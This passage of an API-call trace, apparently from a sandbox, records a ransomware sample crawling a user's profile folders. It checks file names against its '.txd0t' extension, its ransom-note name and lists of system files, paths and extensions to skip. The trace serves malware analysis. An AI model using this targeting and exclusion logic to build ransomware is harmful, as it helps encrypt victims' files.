(pszPath="Bing.url") returned=".url" [0119.732] StrCmpW (psz1=".url", psz2=".txd0t") returned 1 [0119.732] StrCmpIW (psz1="Bing.url", psz2="bootsect.bak") returned -1 [0119.733] StrCmpIW (psz1="Bing.url", psz2="iconcache.db") returned -1 [0119.733] StrCmpIW (psz1="Bing.url", psz2="thumbs.db") returned -1 [0119.735] StrCmpIW (psz1="Bing.url", psz2=" ransomware ") returned 1 [0119.736] StrCmpIW (psz1="Bing.url", psz2=" ransom ") returned 1 [0119.737] StrCmpIW (psz1="Bing.url", psz2="debug.txt") returned -1 [0119.737] StrCmpIW (psz1="Bing.url", psz2="boot.ini") returned -1 [0119.738] StrCmpIW (psz1="Bing.url", psz2="desktop.ini") returned -1 [0119.740] StrCmpIW (psz1="Bing.url", psz2="autorun.inf") returned 1 [0119.740] StrCmpIW (psz1="Bing.url", psz2="ntuser.dat") returned -1 [0119.740] StrCmpIW (psz1="Bing.url", psz2="ntldr") returned -1 [0119.742] StrCmpIW (psz1="Bing.url", psz2="ntdetect.com") returned -1 [0119.742] StrCmpIW (psz1="Bing.url", psz2="bootfont.bin") returned -1 [0119.742] StrCmpIW (psz1="Bing.url", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.742] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0119.742] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".url") returned=".url|.mui" [0119.744] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.745] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.748] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.748] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0119.751] StrCmpW (psz1="Links", psz2=".") returned 1 [0119.752] StrCmpW (psz1="Links", psz2="..") returned 1 [0119.753] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0119.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0119.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Links", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0119.755] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0119.756] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.756] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0119.760] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.760] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.761] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0119.764] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.764] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.764] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.766] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\boot\\") returned 0x0 [0119.767] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0119.768] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\programdata\\") returned 0x0 [0119.769] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\drivers\\") returned 0x0 [0119.769] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\wsus\\") returned 0x0 [0119.770] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.771] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.772] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="crypt_detect") returned 0x0 [0119.773] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="cryptolocker") returned 0x0 [0119.773] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="ransomware") returned 0x0 [0119.775] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0119.775] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.775] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files") returned 0x0 [0119.776] GetProcessHeap () returned 0xe30000 [0119.776] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xed39f8 [0119.777] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Favorites\\Links", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0119.778] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\Links", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links\\*") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\*" [0119.778] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.785] StrCmpW (psz1=".", psz2=".") returned 0 [0119.785] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.786] StrCmpW (psz1="..", psz2=".") returned 1 [0119.787] StrCmpW (psz1="..", psz2="..") returned 0 [0119.787] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.789] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.789] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.789] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.791] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.792] GetProcessHeap () returned 0xe30000 [0119.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.793] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0119.794] FindClose (in: hFindFile=0xec1eb0 | out: hFindFile=0xec1eb0) returned 1 [0119.799] GetProcessHeap () returned 0xe30000 [0119.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.799] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0119.799] StrCmpW (psz1="Links", psz2=".") returned 1 [0119.799] StrCmpW (psz1="Links", psz2="..") returned 1 [0119.800] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.800] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.800] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Links", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\boot\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\programdata\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\drivers\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\wsus\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="crypt_detect") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="cryptolocker") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="ransomware") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.800] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files") returned 0x0 [0119.800] GetProcessHeap () returned 0xe30000 [0119.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xef3600 [0119.800] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0119.800] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\*") returned="C:\\Users\\FD1HVy\\Links\\*" [0119.800] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0119.801] StrCmpW (psz1=".", psz2=".") returned 0 [0119.801] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.801] StrCmpW (psz1="..", psz2=".") returned 1 [0119.801] StrCmpW (psz1="..", psz2="..") returned 0 [0119.801] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.801] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.801] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.801] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0119.801] StrCmpW (psz1="Desktop.lnk", psz2=".") returned 1 [0119.801] StrCmpW (psz1="Desktop.lnk", psz2="..") returned 1 [0119.801] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0119.801] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0119.801] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Desktop.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Desktop.lnk") returned="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" [0119.801] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0119.801] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="bootsect.bak") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="iconcache.db") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="thumbs.db") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2=" ransomware ") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2=" ransom ") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="debug.txt") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="boot.ini") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="desktop.ini") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="autorun.inf") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="ntuser.dat") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="ntldr") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="ntdetect.com") returned -1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="bootfont.bin") returned 1 [0119.801] StrCmpIW (psz1="Desktop.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.801] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0119.801] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.802] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0119.802] StrCmpW (psz1="Downloads.lnk", psz2=".") returned 1 [0119.802] StrCmpW (psz1="Downloads.lnk", psz2="..") returned 1 [0119.802] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0119.802] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0119.802] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Downloads.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Downloads.lnk") returned="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" [0119.802] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0119.802] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="bootsect.bak") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="iconcache.db") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="thumbs.db") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2=" ransomware ") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2=" ransom ") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="debug.txt") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="boot.ini") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="desktop.ini") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="autorun.inf") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="ntuser.dat") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="ntldr") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="ntdetect.com") returned -1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="bootfont.bin") returned 1 [0119.802] StrCmpIW (psz1="Downloads.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.802] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0119.802] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.802] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0119.802] StrCmpW (psz1="OneDrive.lnk", psz2=".") returned 1 [0119.802] StrCmpW (psz1="OneDrive.lnk", psz2="..") returned 1 [0119.802] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0119.802] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0119.802] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="OneDrive.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk") returned="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" [0119.802] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0119.802] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.802] StrCmpIW (psz1="OneDrive.lnk", psz2="bootsect.bak") returned 1 [0119.802] StrCmpIW (psz1="OneDrive.lnk", psz2="iconcache.db") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="thumbs.db") returned -1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransomware ") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransom ") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="debug.txt") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="boot.ini") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="desktop.ini") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="autorun.inf") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="ntuser.dat") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="ntldr") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="ntdetect.com") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="bootfont.bin") returned 1 [0119.803] StrCmpIW (psz1="OneDrive.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.803] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0119.803] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.803] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0119.803] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0119.803] GetProcessHeap () returned 0xe30000 [0119.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.803] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: 